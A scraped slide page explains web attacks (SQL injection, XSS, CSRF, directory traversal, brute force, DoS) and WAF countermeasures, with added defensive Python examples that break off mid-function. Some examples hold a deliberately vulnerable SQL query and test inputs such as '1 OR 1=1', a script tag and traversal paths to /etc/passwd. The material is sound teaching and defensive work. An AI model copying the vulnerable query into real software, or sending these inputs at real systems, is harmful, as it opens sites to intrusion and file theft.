OWASP Top 10 Vulnerabilities 2017- AppTrana
Ishan Mathur
 
Microservices Security
Aditi Anand
 
OWASP Serbia - A3 broken authentication and session management
Nikola Milosevic
 
Owasp top 10
YasserElsnbary
 
The Complete Web Application Security Testing Checklist
Cigital
 
Web Application Vulnerabilities
Preetish Panda
 
Realities of Security in the Cloud - CSS ATX 2017
Alert Logic
 
Security-testing presentation
Ezhilan Elangovan (Eril)
 
OWASP Top 10 2017 - New Vulnerabilities
Dilum Bandara
 
OWASP Top 10 2017
Siddharth Phatarphod
 

Viewers also liked (19)

PDF
Web Application Firewalls Detection, Bypassing And Exploitation
Sandro Gauci
 
PDF
Valtion yhteinen tietoliikenneratkaisu - VY-verkko yhdistää turvalli-sesti kä...
Valtiokonttori / Statskontoret / State Treasury of Finland
 
PPT
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
Neil Matatall
 
DOCX
External XML Entities
William McKelphin
 
PPT
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 
PDF
SSRF vs. Business-critical applications. XXE tunneling in SAP
ERPScan
 
PDF
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Lionel Briand
 
PPTX
Waf bypassing Techniques
Avinash Thapa
 
PDF
SSRF workshop
Ivan Novikov
 
PDF
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
OWASP Ottawa
 
PDF
CloudFlare vs Incapsula: Round 2
Zero Science Lab
 
PPT
Advanced SQL Injection
amiable_indian
 
PDF
Sql injection with sqlmap
Herman Duarte
 
PPTX
Web application attack Presentation
Khoa Nguyen
 
PPT
Bypass file upload restrictions
Mukesh k.r
 
PDF
CloudFlare vs Incapsula vs ModSecurity
Zero Science Lab
 
PDF
Spot the Web Vulnerability
Miroslav Stampar
 
PDF
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
ODP
Web Application Firewall
Chandrapal Badshah
 
Web Application Firewalls Detection, Bypassing And Exploitation
Sandro Gauci
 
Valtion yhteinen tietoliikenneratkaisu - VY-verkko yhdistää turvalli-sesti kä...
Valtiokonttori / Statskontoret / State Treasury of Finland
 
2009: Securing Applications With Web Application Firewalls and Vulnerability ...
Neil Matatall
 
External XML Entities
William McKelphin
 
Methods to Bypass a Web Application Firewall Eng
Dmitry Evteev
 
SSRF vs. Business-critical applications. XXE tunneling in SAP
ERPScan
 
Known XML Vulnerabilities Are Still a Threat to Popular Parsers ! & Open Sour...
Lionel Briand
 
Waf bypassing Techniques
Avinash Thapa
 
SSRF workshop
Ivan Novikov
 
XML Attack Surface - Pierre Ernst (OWASP Ottawa)
OWASP Ottawa
 
CloudFlare vs Incapsula: Round 2
Zero Science Lab
 
Advanced SQL Injection
amiable_indian
 
Sql injection with sqlmap
Herman Duarte
 
Web application attack Presentation
Khoa Nguyen
 
Bypass file upload restrictions
Mukesh k.r
 
CloudFlare vs Incapsula vs ModSecurity
Zero Science Lab
 
Spot the Web Vulnerability
Miroslav Stampar
 
Bug Bounty Hunter Methodology - Nullcon 2016
bugcrowd
 
Web Application Firewall
Chandrapal Badshah
 
Ad

Similar to Why You Need A Web Application Firewall (20)

PDF
Top Ten Web Attacks
Ajay Ohri
 
PDF
Are you fighting_new_threats_with_old_weapons
Bhargav Modi
 
PPTX
nCircle Webinar: Get your Black Belt
nCircle - a Tripwire Company
 
PDF
375 378
Editor IJARCET
 
PDF
Web vulnerabilities
Krishna Gehlot
 
PDF
Web Application Security with PHP
jikbal
 
PPT
Web Application Security
Abdul Wahid
 
PPTX
LECTURE-DEC-6_web-application-attacks (1).pptx
JhonFrancisDuarte
 
PPTX
The Enemy On The Web
Bishan Singh
 
PDF
C01461422
IOSR Journals
 
PPT
Web Application Security
Chris Hillman
 
PPTX
CyberSecurityppt. pptx
iamayesha2526
 
PPT
Web Hacking
Information Technology
 
PDF
Web Vulnerabilities_NGAN Seok Chern
Quek Lilian
 
PDF
Owasp top 10 2013
Edouard de Lansalut
 
PPTX
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
PPT
Intro to Web Application Security
Rob Ragan
 
PDF
Web Application Security Guide by Qualys 2011
nat page
 
PDF
Qg was guide
nat page
 
PDF
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
Top Ten Web Attacks
Ajay Ohri
 
Are you fighting_new_threats_with_old_weapons
Bhargav Modi
 
nCircle Webinar: Get your Black Belt
nCircle - a Tripwire Company
 
Web vulnerabilities
Krishna Gehlot
 
Web Application Security with PHP
jikbal
 
Web Application Security
Abdul Wahid
 
LECTURE-DEC-6_web-application-attacks (1).pptx
JhonFrancisDuarte
 
The Enemy On The Web
Bishan Singh
 
C01461422
IOSR Journals
 
Web Application Security
Chris Hillman
 
CyberSecurityppt. pptx
iamayesha2526
 
Web Vulnerabilities_NGAN Seok Chern
Quek Lilian
 
Owasp top 10 2013
Edouard de Lansalut
 
Hackers versus Developers and Secure Web Programming
Akash Mahajan
 
Intro to Web Application Security
Rob Ragan
 
Web Application Security Guide by Qualys 2011
nat page
 
Qg was guide
nat page
 
Rich Web App Security - Keeping your application safe
Jeremiah Grossman
 
Ad

Recently uploaded (20)

PPTX
Building a Production-Ready Barts Health Secure Data Environment Tooling, Acc...
Barts Health
 
PPTX
Darren Mills The Migration Modernization Balancing Act: Navigating Risks and...
AWS Chicago
 
PDF
NewMind AI - Journal 100 Insights After The 100th Issue
NewMind AI
 
PPTX
WooCommerce Workshop: Bring Your Laptop
Laura Hartwig
 
PPTX
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
PDF
Blockchain Transactions Explained For Everyone
CIFDAQ
 
PDF
Persuasive AI: risks and opportunities in the age of digital debate
Speck&Tech
 
PDF
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
PDF
DevBcn - Building 10x Organizations Using Modern Productivity Metrics
Justin Reock
 
PPTX
Extensions Framework (XaaS) - Enabling Orchestrate Anything
ShapeBlue
 
PDF
Ampere Offers Energy-Efficient Future For AI And Cloud
ShapeBlue
 
PDF
How Startups Are Growing Faster with App Developers in Australia.pdf
India App Developer
 
PDF
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
PDF
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
PDF
Fl Studio 24.2.2 Build 4597 Crack for Windows Free Download 2025
faizk77g
 
PDF
Wojciech Ciemski for Top Cyber News MAGAZINE. June 2025
Dr. Ludmila Morozova-Buss
 
PDF
CIFDAQ Weekly Market Wrap for 11th July 2025
CIFDAQ
 
PDF
TrustArc Webinar - Data Privacy Trends 2025: Mid-Year Insights & Program Stra...
TrustArc
 
PDF
SFWelly Summer 25 Release Highlights July 2025
Anna Loughnan Colquhoun
 
PDF
July Patch Tuesday
Ivanti
 
Building a Production-Ready Barts Health Secure Data Environment Tooling, Acc...
Barts Health
 
Darren Mills The Migration Modernization Balancing Act: Navigating Risks and...
AWS Chicago
 
NewMind AI - Journal 100 Insights After The 100th Issue
NewMind AI
 
WooCommerce Workshop: Bring Your Laptop
Laura Hartwig
 
Building Search Using OpenSearch: Limitations and Workarounds
Sease
 
Blockchain Transactions Explained For Everyone
CIFDAQ
 
Persuasive AI: risks and opportunities in the age of digital debate
Speck&Tech
 
The Builder’s Playbook - 2025 State of AI Report.pdf
jeroen339954
 
DevBcn - Building 10x Organizations Using Modern Productivity Metrics
Justin Reock
 
Extensions Framework (XaaS) - Enabling Orchestrate Anything
ShapeBlue
 
Ampere Offers Energy-Efficient Future For AI And Cloud
ShapeBlue
 
How Startups Are Growing Faster with App Developers in Australia.pdf
India App Developer
 
Log-Based Anomaly Detection: Enhancing System Reliability with Machine Learning
Mohammed BEKKOUCHE
 
SWEBOK Guide and Software Services Engineering Education
Hironori Washizaki
 
Fl Studio 24.2.2 Build 4597 Crack for Windows Free Download 2025
faizk77g
 
Wojciech Ciemski for Top Cyber News MAGAZINE. June 2025
Dr. Ludmila Morozova-Buss
 
CIFDAQ Weekly Market Wrap for 11th July 2025
CIFDAQ
 
TrustArc Webinar - Data Privacy Trends 2025: Mid-Year Insights & Program Stra...
TrustArc
 
SFWelly Summer 25 Release Highlights July 2025
Anna Loughnan Colquhoun
 
July Patch Tuesday
Ivanti
 

Why You Need A Web Application Firewall

  • 1. Why you need a Web App Firewall and more A Review of Web Application Attacks & Countermeasures
  • 2. A Review of Web Application Attacks and Countermeasures Why you need a Web App Firewall (and more) While the details of these attacks vary greatly, the key threat concepts -- and the main defensive countermeasures -- are well-understood and can be boiled down to a manageable list. Let's take a look at the major attack types that your Microsoft IIS Web servers , database-enabled Web sites and Web-based applications need to be ready for. We will also point you to the Port80 Software solutions that provide effective counter-measures to these types of attacks. There are so many types of Web-based attacks and security risks to watch out for, where do you start?
  • 3. Network and System Reconnaissance Why you need a Web App Firewall (and more) Camouflage should be "standard issue" for Web servers.   The first task of a Web attacker (a cyber criminal, internal or external) is to determine your operating system, Web server, application server and database platforms.
  • 4. Network and System Reconnaissance, cont. Why you need a Web App Firewall (and more) The most successful attacks are often targeted attacks , so removing or obfuscating the signatures of your technology platforms -- both obvious ones like the server name header or file extensions in HTTP, or the TCP/IP window size, as well as more subtle signatures, like cookie names, ETag formats, HTTP header order, or services running on IP/port combinations -- is an important type of countermeasure in itself.
  • 5. Network and System Reconnaissance, cont. Why you need a Web App Firewall (and more) This can either dissuade intruders from attacking your Web site or Web application altogether or force them to make incorrect assumptions that lead them to try the wrong types of attacks (for instance, a Linux/UNIX hack on a Windows system). In turn, this makes it easier for firewalls and IDS systems to better identify and block those attacks directly. Port80 Solutions:   ServerMask
• 6. Image and File Leeching: Do not serve Web content for others unknowingly. A lower-priority attack that costs many sites precious bandwidth and responsiveness is a leeching attack, where a hacker identifies file resources on your Web site, like images and video, that are not access controlled or protected by authentication.
• 7. Image and File Leeching, cont.: They link to the file resource on your site from within their own Web page, so that their Web users access your content directly (which you served and paid the bandwidth for). Unaware Web users will not know that it is actually your content they are viewing. The solution is to make sure that Web requests for file resources on a site or application are indeed from a Web user who is on your site, not on another site that has deep linked to your file resources.
• 8. Image and File Leeching, cont.: The countermeasures to stop this type of leeching attack range from the simple to the more robust, from referer checking through time-limited or "sessionized" URLs. You can also weed out the more amateurish types of leeching bots and scripts by checking the cookie, browser, and HTTP header details for each request. Port80 Solutions: LinkDeny
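The two countermeasures slide 8 names, referer checking and time-limited "sessionized" URLs, as an added example that is not Port80 Software's LinkDeny: a referer check against the site's own hostnames, and an HMAC-signed URL that expires and is bound to a session. The hostnames, the signing key and the `sid`/`exp`/`sig` query parameter names are assumptions made for this example.

```python
"""Hotlink protection: referer check and time-limited, sessionized URLs.

Added example, not Port80 Software's LinkDeny. The site hostnames, the
signing secret and the query parameter names are constructed here.
"""
import hashlib
import hmac
import time
from urllib.parse import parse_qs, urlparse

SECRET = b"example-signing-key"                  # constructed; load from a secret store in practice
OUR_HOSTS = {"www.example.com", "example.com"}   # assumed hostnames of this site


def referer_allowed(referer, require_referer=False):
    """Simple referer check: allow if the Referer names one of our hosts.
    Blank referers are common (privacy settings, direct links), so by default
    they pass; set require_referer=True for a stricter policy. The slide notes
    the referer can be spoofed, so treat this as a first, cheap filter."""
    if not referer:
        return not require_referer
    return urlparse(referer).hostname in OUR_HOSTS


def sign_url(path, expires, session_id=""):
    """Build a URL for a protected resource that is valid until `expires`
    (Unix time) and, if session_id is given, only for that session."""
    msg = f"{path}|{expires}|{session_id}".encode()
    sig = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return f"{path}?exp={expires}&sid={session_id}&sig={sig}"


def verify_signed_url(url, session_id="", now=None):
    """True only if the signature covers this exact path, expiry and session,
    the session matches the caller's, and the link has not expired."""
    now = time.time() if now is None else now
    parsed = urlparse(url)
    q = parse_qs(parsed.query)
    try:
        expires = int(q["exp"][0])
        sig = q["sig"][0]
        sid = q.get("sid", [""])[0]
    except (KeyError, ValueError):
        return False
    if sid != session_id or expires < now:
        return False
    msg = f"{parsed.path}|{expires}|{sid}".encode()
    expected = hmac.new(SECRET, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, sig)


if __name__ == "__main__":
    link = sign_url("/media/clip.mp4", int(time.time()) + 300, "session-123")
    print(link)
    print("valid now:", verify_signed_url(link, "session-123"))
```

A signed URL of this kind is what makes a deep link useless to a third-party page: copying the link only works until `exp` passes and, with a session bound in, only from the browser that holds that session.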
• 9. Restricting Access: Block IPs that are no good (up to no good, or not good for you). You can also protect against undesired use of your Web content by applying IP access control to that content. This is often overlooked on sites that use authentication and authorization, but what if you need to host content for anonymous users as well -- or exclusively?
• 10. Restricting Access, cont.: You may still be able to limit your audience, and hence your exposure to malicious requests. If, for instance, your site or application is designed for users in a handful of specific countries, why let users from other countries (including perhaps those known for a disproportionate share of phishing and fraud) access the Web content and endlessly probe how it is served, costing you bandwidth in the meantime? And if unwanted traffic persists from a particular Web site or IP range, why continue to treat that traffic as if it were legitimate?
• 11. Restricting Access, cont.: Controlling access to Web content is by no means the same as locking down your Web server, site and application against determined exploits, but it can be a prudent deterrent to further abuse. Port80 Solutions: LinkDeny
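The IP access control of slides 9 to 11, as an added example that is not Port80 Software's LinkDeny: a policy of CIDR allow and deny ranges, with deny winning over allow, plus a counter that turns a persistently abusive address into a deny rule, which is the "why continue to treat that traffic as legitimate?" point. The ranges and thresholds are constructed for this example; a country restriction would need a geolocation database, which is not shown.

```python
"""IP access control by CIDR range, with automatic deny for repeat offenders.

Added example, not Port80 Software's LinkDeny. Ranges and thresholds are
constructed here.
"""
import ipaddress


class IpAccessPolicy:
    """Deny rules win over allow rules. If an allow list is given, anything
    outside it is refused (default-deny); with no allow list, only the deny
    list applies."""

    def __init__(self, allow=(), deny=()):
        self.allow = [ipaddress.ip_network(n) for n in allow]
        self.deny = [ipaddress.ip_network(n) for n in deny]
        self.abuse = {}  # address -> count of abusive requests seen

    def permits(self, addr):
        try:
            ip = ipaddress.ip_address(addr)
        except ValueError:
            return False  # malformed value (e.g. a forged header): refuse
        # `ip in net` is False across address families, so v4/v6 mixing is safe.
        if any(ip in net for net in self.deny):
            return False
        if self.allow:
            return any(ip in net for net in self.allow)
        return True

    def record_abuse(self, addr, threshold=5):
        """Count abusive requests (probes, errors) per address; once the
        threshold is reached, add a host-sized deny rule for it."""
        n = self.abuse.get(addr, 0) + 1
        self.abuse[addr] = n
        if n >= threshold:
            self.deny.append(ipaddress.ip_network(addr))  # /32 or /128
        return n


if __name__ == "__main__":
    policy = IpAccessPolicy(allow=["203.0.113.0/24"], deny=["203.0.113.200/29"])
    for a in ["203.0.113.5", "203.0.113.201", "198.51.100.1"]:
        print(a, "allowed" if policy.permits(a) else "blocked")
```

The check should run on the address the connection actually came from, not on a client-supplied header such as X-Forwarded-For unless a trusted proxy in front of the server sets it.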
• 12. SQL Injection Attacks: If it is going in the database, clean it up first. SQL injection attacks attempt to use application code to access or corrupt database content. This is accomplished via a Web request in which the Web user's input is incorrectly filtered for string literal escape characters that can be embedded in your SQL statements (like " or *), or more generally is not strongly typed or sanitized, and is thereby unexpectedly interpreted and executed as SQL.
• 13. SQL Injection Attacks, cont.: You can code to avoid this type of attack in your Web application, but many Web developers do not have the time or the expertise to cover the types of input sanitization required to make sure that: 1. characters passed in URL strings do not allow for unintended database access and control, and 2. the type of data being passed in the URL is what was intended (for example, checking that user-supplied input characters expected in a numeric field to be used in a SQL statement are indeed numeric).
• 14. SQL Injection Attacks, cont.: You can also work to make the database more secure with such measures as stored procedures and least-privilege security for the accounts accessing the database. Still, you need to sanitize the inputs allowed to reach the database to avoid parser-evasion attacks that sneak extra characters into a string, allowing an attacker to append commands to a normal variable value in order to delete or alter database content (or escalate their privileges on your application or the server itself). Port80 Solutions: ServerDefender AI, ServerDefender VP
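The numeric-field check from slide 13 and the "characters appended to a normal variable value" problem from slide 14, as an added example that is not Port80 Software's code: a lookup that splices the raw parameter into the statement, beside the fixed version that validates the value as an integer and binds it as a query parameter. It uses Python's built-in sqlite3 module and a constructed in-memory users table.

```python
"""SQL injection: a vulnerable lookup beside its parameterized, type-checked form.

Added example, not Port80 Software's code. Uses sqlite3 with a constructed
in-memory users table.
"""
import sqlite3


def setup():
    """Constructed sample database for this example."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, role TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "user"), (2, "bob", "admin")],
    )
    return con


def lookup_vulnerable(con, user_id):
    """Before: the raw URL parameter is spliced into the statement, so any extra
    characters in the value become part of the SQL and run as SQL."""
    sql = "SELECT name FROM users WHERE id = " + str(user_id) + " ORDER BY id"
    return [row[0] for row in con.execute(sql)]


def is_valid_id(value):
    """The type check the slide asks for: a numeric field must be numeric.
    isdecimal() accepts only characters int() will parse as digits."""
    if isinstance(value, bool):
        return False
    if isinstance(value, int):
        return value >= 0
    return isinstance(value, str) and value.isdecimal()


def lookup_safe(con, user_id):
    """After: validate the type, then bind the value as a parameter so the
    driver never interprets it as SQL."""
    if not is_valid_id(user_id):
        raise ValueError("id must be a non-negative integer")
    rows = con.execute("SELECT name FROM users WHERE id = ? ORDER BY id", (int(user_id),))
    return [row[0] for row in rows]


if __name__ == "__main__":
    con = setup()
    print("vulnerable, normal input:", lookup_vulnerable(con, "1"))
    print("vulnerable, tampered input:", lookup_vulnerable(con, "1 OR 1=1"))
    print("safe, normal input:", lookup_safe(con, "1"))
```

Parameter binding is the fix that holds regardless of which characters an input filter happens to catch; the type check is the cheap extra layer for fields that should never contain anything but digits.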
• 15. Buffer Overflow Attacks: Put some limits on data requested from unknown Web users. Attackers love to throw huge amounts of malicious data at systems to see what limits have been set and to see whether too much data crammed into a particular form field or URL string will crash the system -- or lead to remote control of your servers.
• 16. Buffer Overflow Attacks, cont.: They will pack high-bit shellcode (a transferable piece of code used as the payload in the exploitation of a software bug) into a Web request, hoping that the developer has not placed any buffer limits on the request and is not sanitizing input into the Web application. Placing a limit on buffer characters easily helps to avoid this type of attack. Port80 Solutions: ServerDefender AI, ServerDefender VP
• 17. Cross-Site Scripting (XSS) Attacks: Don't become a vector for attacks on other sites or your Web visitors themselves. Often used in conjunction with phishing, social engineering, and other browser exploits, XSS attacks inject malicious HTML or client-side scripts into Web pages viewed by other users, thereby bypassing the access controls that browsers use to make sure requests are from the same domain (the same origin policy).
• 18. Cross-Site Scripting (XSS) Attacks, cont.: By these means, an attacker can gain elevated access privileges to sensitive page content, session cookies, and a variety of other client-side objects through XSS attacks. Some XSS attacks can be tracked to DOM-based or local cross-site script vulnerabilities within a page's client-side script itself, often called non-persistent or reflected XSS vulnerabilities. When data provided by a Web user is used immediately by server-side scripts to generate a page of results for that user, and unvalidated user-supplied data is included in the resulting page without HTML encoding, client-side code can be injected into the dynamic page.
• 19. Cross-Site Scripting (XSS) Attacks, cont.: If an attacker can convince a user to follow a malicious URL which injects code into the results page, the attacker gets full access to that page's content, where many other traps can be laid for the user, like false search engine or database search results displaying hacker-designed and hacker-controlled URLs. Port80 Solutions: ServerDefender AI, ServerDefender VP.
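The reflected case described on slides 18 and 19 (a search query echoed into a results page without HTML encoding), as an added example that is not Port80 Software's code: the vulnerable page builder beside the fixed one, which HTML-encodes the query and each result for the context it lands in and refuses non-http(s) schemes in links, so the "hacker-controlled URLs" trap is closed as well. The page layout and sample inputs are constructed.

```python
"""Reflected XSS: a results page that echoes raw input, beside the encoded form.

Added example, not Port80 Software's code. Page layout and inputs are
constructed for this example.
"""
import html


def results_page_vulnerable(query, hits):
    """Before: the query and each hit are dropped into the markup unencoded."""
    items = "".join(f'<li><a href="{h}">{h}</a></li>' for h in hits)
    return f"<p>Results for {query}:</p><ul>{items}</ul>"


def safe_link(url):
    """Only http(s) URLs may become links; anything else (javascript:, data:)
    is dropped rather than rendered."""
    return url.lower().startswith(("http://", "https://"))


def results_page_safe(query, hits):
    """After: every value is HTML-encoded for where it lands. Text nodes use
    html.escape; attribute values use html.escape(quote=True) so quotes cannot
    break out of the href."""
    items = "".join(
        f'<li><a href="{html.escape(h, quote=True)}">{html.escape(h)}</a></li>'
        for h in hits
        if safe_link(h)
    )
    return f"<p>Results for {html.escape(query)}:</p><ul>{items}</ul>"


if __name__ == "__main__":
    q = "<script>alert(1)</script>"           # constructed hostile query
    print(results_page_vulnerable(q, []))
    print(results_page_safe(q, []))
```

Encoding on output, at the point where data meets markup, is what stops the injected string from being parsed as HTML; input filtering alone misses cases that only become dangerous in a particular context.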
• 23. Cross-Site Request Forgery Attacks: Seriously, don't become a vector for indirect attacks on other sites or your visitors. Cross-site request forgery (CSRF or XSRF), also known as a one-click attack or session riding, is an exploit very similar to an XSS attack. Rather than injecting unauthorized code into a Web site, a cross-site request forgery attack only transmits unauthorized commands from a user that the Web site or application considers to be authenticated.
• 24. Cross-Site Request Forgery Attacks, cont.: At risk are Web sites and applications that perform actions based on input from trusted and authenticated users without requiring the user to authorize the specific action. These attacks are characteristic vulnerabilities of Ajax-based applications that make use of the XMLHttpRequest (XHR) API. A user that is authenticated by a cookie saved in their Web browser could unknowingly send an HTTP request to a site that trusts them and thereby cause an unwanted action (for instance, withdrawing funds from a bank account).
• 25. Cross-Site Request Forgery Attacks, cont.: These types of attacks are very common on Internet forums, where users are allowed to post images but not JavaScript. To combat this, URLs can be sessionized by implementing a transient authentication mechanism (such as a constantly changing, hidden form field value) in place of persistent, cookie-based, or HTTP authentication. A simpler approach, requiring far less code rewriting, is to check that the referer in the request is from an authorized, on-site page. This can be spoofed, however, and so should not be relied upon exclusively.
• 26. Cross-Site Request Forgery Attacks, cont.: For Ajax scenarios in particular, a modestly costly method for combating CSRF attacks is to require the double submission of any cookies that are used for authentication -- essentially by reading the authentication token from the cookie on the client side using JavaScript, submitting it separately with the GET or POST, and then validating it along with the cookie itself. Cookie encryption or signing also helps to defeat these attacks. Port80 Solutions: ServerDefender AI, ServerDefender VP, LinkDeny (weak protection)
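The server side of the double-submit scheme from slide 26, combined with the cookie signing it mentions and the optional referer check from slide 25, as an added example that is not Port80 Software's code: the token is a random nonce plus an HMAC over the session id, so it is both signed and bound to one session; a request passes only when the cookie copy and the submitted copy are present, equal and valid. The cookie name `csrf`, the form field name, the signing key and the site hostname are assumptions for this example; the client-side JavaScript that copies the cookie into the request is not shown.

```python
"""CSRF double-submit validation with a session-bound, HMAC-signed token.

Added example, not Port80 Software's code. Cookie/field names, the key and
the hostname are constructed here.
"""
import hashlib
import hmac
import secrets
from urllib.parse import urlparse

SECRET = b"example-csrf-key"        # constructed; load from a secret store in practice
OUR_HOST = "www.example.com"        # assumed hostname of this site


def _mac(session_id, nonce):
    return hmac.new(SECRET, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()


def issue_csrf_token(session_id):
    """Token to set as the csrf cookie. The page's JavaScript reads this cookie
    and echoes it in the form field or XHR body of every state-changing request."""
    nonce = secrets.token_hex(16)
    return f"{nonce}.{_mac(session_id, nonce)}"


def valid_token(session_id, token):
    """Signature check: the token must have been issued for this session."""
    try:
        nonce, mac = token.split(".")
    except (AttributeError, ValueError):
        return False
    return hmac.compare_digest(_mac(session_id, nonce), mac)


def check_request(cookies, form, session_id, referer=None):
    """Double-submit rule: cookie token and submitted token must both be present,
    equal and valid for the session. A cross-site page cannot read our cookie,
    so it cannot supply the matching second copy. The referer, when present,
    is an additional signal only, since the slide notes it can be spoofed."""
    c, f = cookies.get("csrf"), form.get("csrf")
    if not c or not f:
        return False
    if not hmac.compare_digest(c.encode(), f.encode()):
        return False
    if not valid_token(session_id, c):
        return False
    if referer is not None and urlparse(referer).hostname != OUR_HOST:
        return False
    return True


if __name__ == "__main__":
    tok = issue_csrf_token("sess-1")
    print("legitimate:", check_request({"csrf": tok}, {"csrf": tok}, "sess-1"))
    print("forged (no echoed token):", check_request({"csrf": tok}, {}, "sess-1"))
```

Binding the token to the session is what the slide's "cookie signing" buys here: an attacker who somehow plants a token value of their own choosing in both places still fails the HMAC check for the victim's session.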
• 27. Directory Traversal Attacks: /admin, /scripts, /noaccess, /etc. If you can get to a file via a URL, an attacker can get to it as well, even if the link is not publicly displayed on your Web site. Also known as ../ (dot dot slash), directory climbing, backtracking, and sometimes a canonicalization attack, a directory traversal attack exploits insufficient security validation and sanitization of user-supplied URL paths in Web site and application requests.
• 28. Directory Traversal Attacks, cont.: This type of attack does not indicate a coding deficiency so much as a lack of security and authentication for all Web resources on a site or application. Microsoft Windows or DOS directory traversal uses the ..\ characters, although many Windows programs or APIs also accept UNIX-like directory traversal characters (../); at least most directory vulnerabilities on Windows are limited to a single partition (C:\, etc.).
• 29. Directory Traversal Attacks, cont.: Though IIS can handle simple cases of directory traversal attacks, this is just a start. You need to stop requests to seemingly non-existent Web resources, sanitize inputs from all odd or non-standard character encodings, ensure document roots are known and string lengths are consistent, and also confirm that no files outside the document root of the site can be served. Of course, the best response to a directory traversal request (the only one that does not give any clues to the attacker) is a good old 404 HTTP response. Port80 Solutions: ServerDefender AI, ServerDefender VP.
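The checklist on slide 29 (non-standard encodings, a known document root, nothing served from outside it, and a plain 404 for anything else), as an added example that is not Port80 Software's code or IIS's own handling: the request path is percent-decoded until stable to catch double encoding, backslashes are normalised to slashes as slide 28 describes, the path is joined to the root and canonicalised, and only a result still inside the root that actually exists gets a 200; everything else gets 404 rather than a 403 that would confirm the path. The document root and file set are constructed.

```python
"""Directory traversal defence: canonicalise, contain to the document root, 404 otherwise.

Added example, not Port80 Software's code nor IIS's own logic. The document
root and the set of existing files are constructed for this example.
"""
import posixpath
from urllib.parse import unquote


def resolve_request_path(doc_root, request_path):
    """Map a URL path to a file path under doc_root, or return None.
    Handles percent-encoding (including double encoding), backslashes,
    embedded NUL bytes and ../ climbing."""
    root = posixpath.normpath(doc_root)
    p = request_path
    # Decode until the string stops changing, so %252e%252e (-> %2e%2e -> ..)
    # is seen as the traversal it is. Bounded to avoid pathological input.
    for _ in range(3):
        decoded = unquote(p)
        if decoded == p:
            break
        p = decoded
    p = p.replace("\\", "/")          # Windows-style ..\ becomes ../
    if "\x00" in p:
        return None                   # NUL truncation trick: refuse outright
    full = posixpath.normpath(posixpath.join(root, p.lstrip("/")))
    # Containment check on the canonical path, not on the raw request string.
    if full != root and not full.startswith(root + "/"):
        return None
    return full


def respond(doc_root, request_path, existing_files):
    """HTTP status to send: 200 only for an existing file inside the root.
    Out-of-root and missing paths both get 404, giving the attacker no hint."""
    full = resolve_request_path(doc_root, request_path)
    if full is None or full not in existing_files:
        return 404
    return 200


if __name__ == "__main__":
    root = "/var/www/site"                                   # assumed document root
    files = {"/var/www/site/index.html", "/var/www/site/images/logo.png"}  # constructed
    for req in ["/index.html", "/images/../index.html", "/../../etc/passwd",
                "/..%2F..%2Fetc%2Fpasswd", "/%252e%252e/%252e%252e/etc/passwd",
                "/..\\..\\windows\\win.ini"]:
        print(req, "->", respond(root, req, files))
```

The important ordering is decode, then normalise, then check containment on the result; checking for ".." in the raw request string is exactly what the encoded variants are designed to slip past.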
• 30. Zero Day Attacks: Protect against attacks before the patch and after the patch. A zero-day (or zero-hour) attack is not so much a specific type of attack as it is a special case of all other types. A zero-day attack is one that exploits heretofore undisclosed or unpatched application vulnerabilities.
• 31. Zero Day Attacks, cont.: Zero-day attacks take advantage of Web security holes for which no solution is currently available. 0-day exploits are released before or on the same day that the vulnerability is discovered or announced, sometimes even on the day that the vendor patch is released to the public. The term derives from the number of days between the public advisory and the release of the exploit. The name itself is an indication of the vendor patch's availability, i.e. the vulnerability affected unpatched systems for zero days.
• 32. Zero Day Attacks, cont.: As new attacks against IIS and application server code emerge, often falling into one of the categories discussed here, it is vital to have a general-purpose Web application firewall covering the bases, protecting the site or app from that attack vector before the platform patches can be applied. Port80 Solutions: ServerDefender AI, ServerDefender VP.
• 33. Brute Force Attacks: A, B, C, D, Admin Access... A brute force attack, sometimes called a dictionary attack, is a method of defeating a cryptographic authentication/authorization scheme by trying a large number of possible answers. The best example is exhaustively working through all possible keys in order to discover a password combination.
• 34. Brute Force Attacks, cont.: Like a zero day attack, brute force attacks are often used to find open, unprotected directories or to break authentication and authorization layers. Effective request throttling -- tracking and limiting the frequency of Web requests per second to a particular login file or directory -- often defeats this form of automated attack. Port80 Solutions: ServerDefender AI
• 35. Denial-of-Service Attack: Too much traffic can be deadly for any Web site. A denial-of-service (DoS) attack is an attempt to make a Web server resource unavailable to its intended users. Although there are many ways to accomplish such an attack, it generally comprises the concerted, malevolent efforts of hackers to prevent an Internet site or application from functioning efficiently or at all, temporarily or indefinitely, by flooding the site or app with an unusually high volume of Web requests, including requests that tie up resources by inducing error states.
• 36. Denial-of-Service Attack, cont.: This, in turn, forces the targeted Web server to reset or consume its resources such that it can no longer serve legitimate requests. As with a brute force attack, being able to identify and block IP addresses with a high frequency of requests can stop these attacks before site resources are used up, keeping legitimate Web users in service.
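The request throttling that slide 34 recommends against brute force and that slide 36 reuses against DoS, as one added example serving both passages and not Port80 Software's ServerDefender: a sliding-window limiter keyed on client IP and path (so a login page can have a tighter budget than static content), which blocks the offending address for a cooling-off period once it exceeds the limit. The limits, window and block duration are constructed values; timestamps are passed in explicitly so the behaviour is deterministic.

```python
"""Per-IP, per-path sliding-window request throttle with temporary blocking.

Added example, not Port80 Software's ServerDefender. Limits and timings are
constructed values; `now` is passed in so the logic is deterministic.
"""
from collections import deque


class RequestThrottle:
    """At most `limit` requests per `window` seconds for each (ip, path).
    An address that exceeds its budget is blocked on every path for
    `block_for` seconds, which is what stops both password guessing and a
    single-source flood before the server's resources are consumed."""

    def __init__(self, limit=5, window=1.0, block_for=60.0):
        self.limit = limit
        self.window = window
        self.block_for = block_for
        self.hits = {}      # (ip, path) -> deque of request timestamps
        self.blocked = {}   # ip -> time at which the block expires

    def allow(self, ip, path, now):
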